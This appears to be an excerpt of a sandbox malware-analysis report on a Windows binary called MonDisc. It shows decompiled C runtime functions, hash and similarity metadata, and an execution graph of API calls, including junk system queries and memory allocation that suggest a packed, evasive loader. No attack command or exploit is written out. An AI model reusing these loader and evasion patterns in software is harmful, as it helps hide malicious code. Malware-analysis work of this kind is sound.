                              				_t131 = __rcx;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) == __rsi) goto 0x2c98e7bf;
                              				if ( *((intOrPtr*)(__rcx + 0x18)) != __rsi) goto 0x2c98e607;
                              				E00007FF67FF62C984D84(__rax);
                              				 *__rax = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98e7a9;
                              				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                              				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x2c98e7a6;
                              				 *((intOrPtr*)(__rcx + 0x50)) = 0;
                              				 *((intOrPtr*)(__rcx + 0x2c)) = 0;
                              				goto 0x2c98e773;
                              				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
                              				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x2c98e788;
                              				_t138 =  *((char*)(__rcx + 0x41));
                              				if (_t138 - 0x20 - 0x5a > 0) goto 0x2c98e653;
                              				_t126 = _t138 - 0x20;
                              				goto 0x2c98e655;
                              				_t87 =  *((intOrPtr*)(0x2ca11bc0 + (_t138 - 0x20) * 8));
                              				 *((intOrPtr*)(__rcx + 0x2c)) = _t87;
                              				if (_t87 == 8) goto 0x2c98e7bf;
                              				_t109 = _t87;
                              				if (_t109 == 0) goto 0x2c98e767;
                              				if (_t109 == 0) goto 0x2c98e753;
                              				if (_t109 == 0) goto 0x2c98e71e;
                              				if (_t109 == 0) goto 0x2c98e6f3;
                              				if (_t109 == 0) goto 0x2c98e6eb;
                              				if (_t109 == 0) goto 0x2c98e6bf;
                              				if (_t109 == 0) goto 0x2c98e6b2;
                              				if (_t87 - 0xfffffffffffffffc != 1) goto 0x2c98e7cf;
                              				E00007FF67FF62C992BBC(__rcx, __rcx, __rsi, __rbp);
                              				goto 0x2c98e76f;
                              				E00007FF67FF62C991650(_t138 - 0x20, _t131);
                              				goto 0x2c98e76f;
                              				if (_t99 == 0x2a) goto 0x2c98e6d5;
                              				E00007FF67FF62C98D920(_t126, _t131, _t131, _t131 + 0x38, _t145);
                              				goto 0x2c98e76f;
                              				 *((long long*)(_t131 + 0x20)) =  *((long long*)(_t131 + 0x20)) + 8;
                              				_t94 =  *( *((intOrPtr*)(_t131 + 0x20)) - 8);
                              				_t95 =  <  ? _t101 : _t94;
                              				 *(_t131 + 0x38) =  <  ? _t101 : _t94;
                              				goto 0x2c98e71a;
                              				 *(_t131 + 0x38) = 0;
                              				goto 0x2c98e773;
                              				if (_t99 == 0x2a) goto 0x2c98e6fe;
                              				goto 0x2c98e6c8;
                              				 *((long long*)(_t131 + 0x20)) =  *((long long*)(_t131 + 0x20)) + 8;
                              				_t96 =  *( *((intOrPtr*)(_t131 + 0x20)) - 8);
                              				 *(_t131 + 0x34) = _t96;
                              				if (_t96 >= 0) goto 0x2c98e71a;
                              				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000004;
                              				 *(_t131 + 0x34) =  ~_t96;
                              				goto 0x2c98e76f;
                              				_t82 = _t99;
                              				if (_t99 == 0x20) goto 0x2c98e74d;
                              				if (_t82 == 0x23) goto 0x2c98e747;
                              				if (_t82 == 0x2b) goto 0x2c98e741;
                              				if (_t82 == 0x2d) goto 0x2c98e73b;
                              				if (_t82 != 0x30) goto 0x2c98e773;
                              				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000008;
                              				goto 0x2c98e773;
                              				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000004;
                              				goto 0x2c98e773;
                              				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000001;
                              				goto 0x2c98e773;
                              				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000020;
                              				goto 0x2c98e773;
                              				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000002;
                              				goto 0x2c98e773;
                              				 *(_t131 + 0x30) = _t143;
                              				 *((intOrPtr*)(_t131 + 0x40)) = sil;
                              				 *(_t131 + 0x38) = _t101;
                              				 *((intOrPtr*)(_t131 + 0x3c)) = 0;
                              				 *((intOrPtr*)(_t131 + 0x54)) = sil;
                              				goto 0x2c98e773;
                              				if (E00007FF67FF62C990258(_t131) == 0) goto 0x2c98e7cf;
                              				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x18))));
                              				 *((char*)(_t131 + 0x41)) = _t98;
                              				if (_t98 != 0) goto 0x2c98e62c;
                              				 *((long long*)(_t131 + 0x18)) =  *((long long*)(_t131 + 0x18)) + 1;
                              				if ( *((intOrPtr*)(_t131 + 0x2c)) == 0) goto 0x2c98e793;
                              				if ( *((intOrPtr*)(_t131 + 0x2c)) != 7) goto 0x2c98e7bf;
                              				 *((intOrPtr*)(_t131 + 0x470)) =  *((intOrPtr*)(_t131 + 0x470)) + 1;
                              				if ( *((intOrPtr*)(_t131 + 0x470)) != 2) goto 0x2c98e621;
                              				return  *((intOrPtr*)(_t131 + 0x28));
                              			}














                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 2c928c4f2e09d2560ef734e902e10d781059de89a2ae683175d19ecee886b20e
                              • Instruction ID: 01026ffb124fd85dcca06296ca1f9430ef9491fccbbbe7e988da7b4aceed6399
                              • Opcode Fuzzy Hash: 2c928c4f2e09d2560ef734e902e10d781059de89a2ae683175d19ecee886b20e
                              • Instruction Fuzzy Hash: 1B618D7AD0C29286EF648F248C6453C37A9FB45FA8F545335D64EC329ACF28E441C706
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E3AC(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long _a8, long long _a16) {
                              
                              				_a8 = __rbx;
                              				_a16 = __rdi;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e3f1;
                              				E00007FF67FF62C984D84(__rax);
                              				 *__rax = 0x16;
                              				E00007FF67FF62C9C599C();
                              				return __edi | 0xffffffff;
                              			}



                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 75e27bd1e5ac5c22d5fe14aa161cd81f02e4cf6e2d3a80113d4d31a56978f943
                              • Instruction ID: 990b861c18602e9c6ac39ea76a444488e95763bfeed27832c8a4811a559774a7
                              • Opcode Fuzzy Hash: 75e27bd1e5ac5c22d5fe14aa161cd81f02e4cf6e2d3a80113d4d31a56978f943
                              • Instruction Fuzzy Hash: 7C617676D0C1968AEF648F248864B7D37A9EB15BA8F141335DA0EC72DBDF28E441C602
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 18%
                              			E00007FF67FF62C9B5B00(signed int __eax, void* __fp0, signed int __r8, signed int __r9) {
                              				long long _v120;
                              				long long _v136;
                              				intOrPtr _v144;
                              				intOrPtr _v152;
                              				void* _t10;
                              				void* _t11;
                              				void* _t13;
                              				void* _t14;
                              				void* _t19;
                              				void* _t21;
                              				long long _t25;
                              				void* _t27;
                              				signed long long _t29;
                              				signed long long _t30;
                              				void* _t31;
                              				signed long long _t33;
                              				signed long long _t34;
                              				signed long long _t36;
                              
                              				asm("movdqa [esp+0x50], xmm6");
                              				asm("movdqa [esp+0x60], xmm7");
                              				_t36 =  *0x2ca16ce0; // 0x7ff0000000000000
                              				asm("dec cx");
                              				asm("dec cx");
                              				_t29 = __r8 &  *0x2ca16d20;
                              				_t33 = __r9 &  *0x2ca16d20;
                              				_t13 = _t33 -  *0x2ca16ce0; // 0x7ff0000000000000
                              				if (_t13 > 0) goto 0x2c9b5db0;
                              				_t14 = _t29 -  *0x2ca16ce0; // 0x7ff0000000000000
                              				if (_t14 > 0) goto 0x2c9b5dc0;
                              				if (_t14 == 0) goto 0x2c9b5d50;
                              				if (_t33 == 0) goto 0x2c9b5da0;
                              				if (_t29 == _t33) goto 0x2c9b5d30;
                              				asm("dec cx");
                              				asm("dec cx");
                              				asm("movapd xmm4, xmm0");
                              				asm("movapd xmm5, xmm1");
                              				asm("movapd xmm3, [0x611a1]");
                              				_t30 = _t29 & _t36;
                              				_t34 = _t33 & _t36;
                              				asm("dec ecx");
                              				asm("dec ecx");
                              				if (_t30 == 0) goto 0x2c9b5ce0;
                              				if (_t34 == 0) goto 0x2c9b5ce0;
                              				_t31 = _t30 - _t34;
                              				_t19 = _t31 - 0x34;
                              				if (_t19 >= 0) goto 0x2c9b5ce0;
                              				asm("pand xmm4, xmm3");
                              				asm("pand xmm5, xmm3");
                              				asm("comisd xmm4, xmm5");
                              				if (_t19 <= 0) goto 0x2c9b5dc0;
                              				if (_t31 == 0x7ff) goto 0x2c9b5d50;
                              				asm("movapd xmm2, xmm4");
                              				asm("movapd xmm3, xmm5");
                              				asm("divsd xmm2, xmm3");
                              				asm("repne dec esp");
                              				asm("repne dec ecx");
                              				asm("dec cx");
                              				asm("dec ecx");
                              				_t21 = (_t34 &  *0x2ca16ce0) - 0x3ff + _t34 - 0x3ff - 0x3ff;
                              				if (_t21 >= 0) goto 0x2c9b5ce0;
                              				asm("movapd xmm4, [0x610d4]");
                              				asm("movapd xmm1, xmm5");
                              				asm("movapd xmm6, xmm2");
                              				asm("movapd xmm7, xmm2");
                              				asm("mulsd xmm7, xmm5");
                              				asm("andpd xmm1, xmm4");
                              				asm("andpd xmm2, xmm4");
                              				asm("subsd xmm5, xmm1");
                              				asm("subsd xmm6, xmm2");
                              				asm("movapd xmm4, xmm1");
                              				asm("mulsd xmm4, xmm2");
                              				asm("subsd xmm4, xmm7");
                              				asm("mulsd xmm1, xmm6");
                              				asm("addsd xmm4, xmm1");
                              				asm("mulsd xmm2, xmm5");
                              				asm("addsd xmm4, xmm2");
                              				asm("mulsd xmm6, xmm5");
                              				asm("addsd xmm6, xmm4");
                              				asm("movapd xmm1, xmm0");
                              				asm("pand xmm1, [0x610b4]");
                              				asm("movapd xmm2, xmm1");
                              				asm("subsd xmm1, xmm7");
                              				asm("subsd xmm2, xmm1");
                              				asm("subsd xmm2, xmm7");
                              				asm("subsd xmm2, xmm6");
                              				asm("addsd xmm2, xmm1");
                              				asm("comisd xmm2, [0x61074]");
                              				if (_t21 >= 0) goto 0x2c9b5ca0;
                              				asm("addsd xmm2, xmm3");
                              				asm("o16 nop [eax+eax]");
                              				asm("comisd xmm0, [0x61058]");
                              				if (_t21 > 0) goto 0x2c9b5cd0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm0, xmm2");
                              				asm("orpd xmm0, [0x61014]");
                              				goto 0x2c9b5dc0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm0, xmm2");
                              				goto 0x2c9b5dc0;
                              				asm("movsd [esp+0x30], xmm0");
                              				asm("movsd [esp+0x40], xmm1");
                              				st0 = __fp0;
                              				st1 = __fp0;
                              				_t25 = _v136;
                              				asm("fclex");
                              				asm("o16 nop [eax+eax]");
                              				asm("fprem");
                              				asm("fnstsw ax");
                              				if ((__eax & 0x00000400) == 0x400) goto 0x2c9b5d00;
                              				_v136 = _t25;
                              				_v120 = _t25;
                              				asm("movsd xmm0, [esp+0x30]");
                              				goto 0x2c9b5dc0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movsd xmm1, xmm0");
                              				asm("pand xmm1, [0x60f94]");
                              				asm("movsd xmm0, [0x60fbc]");
                              				asm("por xmm0, xmm1");
                              				goto 0x2c9b5dc0;
                              				asm("movapd xmm1, xmm0");
                              				asm("por xmm1, [0x60fb4]");
                              				asm("dec cx");
                              				r9d = 1;
                              				_v152 = 8;
                              				_v144 = 0x21;
                              				_v120 = 2;
                              				_t10 = E00007FF67FF62C9D1074(_t11, 0x16, (__eax & 0x00000400) - 0x400, 0x2ca16cc0, _t27, _t31);
                              				goto 0x2c9b5dc0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm1, [0x60f88]");
                              				goto 0x2c9b5d5c;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm0, xmm1");
                              				asm("o16 nop [eax+eax]");
                              				asm("movdqa xmm7, [esp+0x60]");
                              				asm("movdqa xmm6, [esp+0x50]");
                              				return _t10;
                              			}






















                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _handle_error
                              • String ID: !$fmod
                              • API String ID: 1757819995-3213614193
                              • Opcode ID: 9c29c3cbe46a40345482930e7195e83d7d9668eee9cffcf7114d307f60ce050e
                              • Instruction ID: cebe3c65fb240d5b1c7c0a6f3995ee0f354ff43d1eeae1818df11e2eb16e0ec0
                              • Opcode Fuzzy Hash: 9c29c3cbe46a40345482930e7195e83d7d9668eee9cffcf7114d307f60ce050e
                              • Instruction Fuzzy Hash: E3512911D2CF8185EA639B39EC157B96668FFA23D0F409733F90DB15A2DF5DA0038641
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 44%
                              			E00007FF67FF62C9D1C18(char __ecx, void* __edx, void* __edi, void* __rdx, void* __rsi, void* __r8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				long long _v48;
                              				char _v56;
                              				void* __rbx;
                              				void* _t31;
                              				char _t32;
                              				long long _t47;
                              				void* _t48;
                              
                              				_t54 = __rsi;
                              				_t53 = __rdx;
                              				asm("movsd [esp+0x20], xmm3");
                              				asm("movsd [esp+0x18], xmm2");
                              				_push(_t48);
                              				_t32 = __ecx;
                              				r8d = 0;
                              				if ( *0x2ca1c740 == __edx) goto 0x2c9d1c53;
                              				r8d = r8d + 1;
                              				if (0x7ff62ca1c750 - 0x2ca1c910 < 0) goto 0x2c9d1c38;
                              				goto 0x2c9d1c5e;
                              				_t47 =  *((intOrPtr*)(0x2ca1c740 + 8 + (r8d + r8d) * 8));
                              				_v48 = _t47;
                              				if (_t47 == 0) goto 0x2c9d1cd1;
                              				_v40 = _a24;
                              				_v36 = _a28;
                              				_v32 = _a32;
                              				_v28 = _a36;
                              				_v24 = _a40;
                              				_v20 = _a44;
                              				_v56 = __ecx;
                              				E00007FF67FF62C9D0EA0(__ecx, __edi, _t48, _a48, __rdx, __rsi);
                              				_t52 =  &_v56;
                              				if (E00007FF67FF62C9BFDE0(0xffc0,  &_v56) != 0) goto 0x2c9d1cc9;
                              				E00007FF67FF62C9D1BE8(_t32, _t47,  &_v56);
                              				asm("movsd xmm0, [esp+0x40]");
                              				goto 0x2c9d1ce6;
                              				E00007FF67FF62C9D0EA0(_t32, __edi, _t48,  &_v56, _t53, _t54);
                              				_t31 = E00007FF67FF62C9D1BE8(_t32, _t47, _t52);
                              				asm("movsd xmm0, [esp+0x80]");
                              				return _t31;
                              			}

















                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_errno_from_matherr
                              • String ID: tanh
                              • API String ID: 1187470696-874243715
                              • Opcode ID: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction ID: 22f75391b1fdad1aa6bd86d72f32734317ed1291106597d9759dc7b7b5dcd8ee
                              • Opcode Fuzzy Hash: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction Fuzzy Hash: CB211036E1C6458BEB60DF28A84016A73A0FB8D360F505535F68DE2B5AEF3CD4008F01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00007FF67FF62C9C6F60(void* __ecx, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long _a8) {
                              				void* _t3;
                              				void* _t12;
                              				void* _t19;
                              
                              				_t12 = __rax;
                              				_a8 = __rbx;
                              				_t3 = E00007FF67FF62C9C670C(6, __rdx, "FlsSetValue", _t19, 0x2ca177f0, 0x2ca177f8);
                              				if (_t12 == 0) goto 0x2c9c6fa0;
                              				E00007FF67FF62C9EE410(_t3, _t12);
                              				goto 0x2c9c6fa6;
                              				return TlsSetValue(??, ??);
                              			}







                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Valuetry_get_function
                              • String ID: FlsSetValue
                              • API String ID: 738293619-3750699315
                              • Opcode ID: eb1b973b29d8f29eeb944f8bd11f3872e7b605d74b20f6105e7a2b599f4eb02e
                              • Instruction ID: 568134f63afb0e8bd1922cecccb65f4aa87208775d5559210909a1e3be2aa5a5
                              • Opcode Fuzzy Hash: eb1b973b29d8f29eeb944f8bd11f3872e7b605d74b20f6105e7a2b599f4eb02e
                              • Instruction Fuzzy Hash: 77E06D61E1868381EF094B54FD404B83222FF48BB0F985432D92D8A39ACE3CEA54C302
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000012.00000002.526473701.00007FFBB01F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_2_7ffbb01f0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
                              • Instruction ID: ad16ac0b54fb2eaf27282e7762eb37b6901703d69d8fb8fd50441a6a77a32298
                              • Opcode Fuzzy Hash: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
                              • Instruction Fuzzy Hash: 9B01677111CB0C4FD748EF0CE451AB6B7E0FB95364F10056DE58AC7661DA36E882CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:2.7%
                              Dynamic/Decrypted Code Coverage:98.8%
                              Signature Coverage:0%
                              Total number of Nodes:740
                              Total number of Limit Nodes:32
57737->57738 57739 7ff62c8f99be GetCurrentProcessId GetUserDefaultLangID GetSystemDefaultLangID 57738->57739 57740 7ff62c8f99f3 57739->57740 57741 7ff62c8f9a7a GetTopWindow 57740->57741 57742 7ff62c8f9a85 GetSystemDefaultLangID 57741->57742 57742->57742 57743 7ff62c8f9a9e 57742->57743 57743->57743 57744 7ff62c8f9c55 GetMessageTime GetMessageExtraInfo IsZoomed 57743->57744 57745 7ff62c8f9c71 57744->57745 57746 7ff62c8f9cbd GetForegroundWindow GetDoubleClickTime GetUserDefaultLangID 57745->57746 57747 7ff62c8f9ce7 57746->57747 57748 7ff62c8f9d3b GetLargePageMinimum 57747->57748 57748->57747 57749 7ff62c8f9d60 GetShellWindow 57748->57749 57750 7ff62c8f9d6b 57749->57750 57751 7ff62c8f9ebf GetCurrentProcessId 57750->57751 57752 7ff62c8f9edd 57751->57752 57753 7ff62c8f9f00 GetCommandLineW GetModuleHandleW 57752->57753 57754 7ff62c8f9f1d 57753->57754 57755 7ff62c8f9f38 GetCommandLineW 57754->57755 57756 7ff62c8f9f43 57755->57756 57757 7ff62c8fdc20 18 API calls 57756->57757 57758 7ff62c8fa050 57757->57758 57759 7ff62c8fe2b0 18 API calls 57758->57759 57760 7ff62c8fa069 57759->57760 57761 7ff62c8fa1c5 GetCommandLineW 57760->57761 57762 7ff62c8fa1d0 57761->57762 57763 7ff62c8fa27a GetCurrentProcessId GetLargePageMinimum GetMessageExtraInfo 57762->57763 57764 7ff62c8fa291 57763->57764 57765 7ff62c8fa2b3 GetWindowTextLengthW 57764->57765 57765->57766 57766->57715 57780 7ff62c8fb7c0 57767->57780 57770 7ff62c9075f0 57773 7ff62c907610 57770->57773 57774 7ff62c907645 57773->57774 58215 7ff62c8fda80 18 API calls 57773->58215 58216 7ff62c8fdd00 18 API calls 57773->58216 58217 7ff62c906b70 18 API calls 57774->58217 57778 7ff62c90765d 57779 7ff62c90769b 57778->57779 58218 7ff62c8fda80 18 API calls 57778->58218 58219 7ff62c8fe2b0 57778->58219 57781 7ff62c8fb7ec 57780->57781 57785 7ff62c8fb80e _fread_nolock 57781->57785 57788 7ff62c8fb96b 57781->57788 57790 7ff62c914990 GetLastError VirtualAlloc SetLastError 57781->57790 57784 7ff62c8f8438 57784->57770 57785->57788 57799 7ff62c8f3037 
57785->57799 57787 7ff62c8fb957 57787->57788 57807 7ff62c8fb1c0 GetLastError VirtualQuery VirtualFree SetLastError VirtualFree 57787->57807 57792 7ff62c973de0 57788->57792 57791 7ff62c9149dc _fread_nolock 57790->57791 57791->57785 57795 7ff62c973de9 57792->57795 57793 7ff62c974a24 IsProcessorFeaturePresent 57796 7ff62c974a3c 57793->57796 57794 7ff62c973df4 57794->57784 57795->57793 57795->57794 57808 7ff62c974d28 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57796->57808 57798 7ff62c974a4f 57798->57784 57809 7ff62c911c26 57799->57809 57817 7ff62c911cf0 57799->57817 57822 7ff62c911a20 57799->57822 57826 7ff62c8fb2d0 57799->57826 57831 7ff62c904bf0 57799->57831 57849 7ff62c911aa8 57799->57849 57800 7ff62c8f2420 57800->57787 57807->57788 57808->57798 57810 7ff62c911c32 57809->57810 57814 7ff62c911a50 57810->57814 57876 7ff62c939ca0 57810->57876 57816 7ff62c911aa3 57814->57816 57860 7ff62c910a90 57814->57860 57816->57800 57984 7ff62c952750 57817->57984 57819 7ff62c911d05 57820 7ff62c911d0d 57819->57820 58015 7ff62c911d70 57819->58015 57820->57800 57823 7ff62c911a50 57822->57823 57824 7ff62c910a90 37 API calls 57823->57824 57825 7ff62c911aa3 57823->57825 57824->57823 57825->57800 58066 7ff62c909080 57826->58066 58081 7ff62c913c30 57831->58081 57833 7ff62c904c18 57834 7ff62c904c3f 57833->57834 57839 7ff62c904c8f 57833->57839 57835 7ff62c904c4d 57834->57835 57836 7ff62c904c46 57834->57836 58102 7ff62c9225b0 18 API calls _handle_error 57835->58102 58090 7ff62c91cb60 57836->58090 58104 7ff62c901970 18 API calls _fread_nolock 57839->58104 57840 7ff62c904c4b 58103 7ff62c90c900 18 API calls 57840->58103 57843 7ff62c904ca8 57845 7ff62c901990 18 API calls 57843->57845 57844 7ff62c904c61 57844->57800 57846 7ff62c904cc5 vfwprintf 57845->57846 58105 7ff62c99c09c 19 API calls 3 library calls 57846->58105 57848 7ff62c904d0c 57848->57800 57850 7ff62c9116c0 35 API calls 57849->57850 57851 7ff62c911aba 57850->57851 57852 7ff62c911bfd 57851->57852 57856 7ff62c911a50 
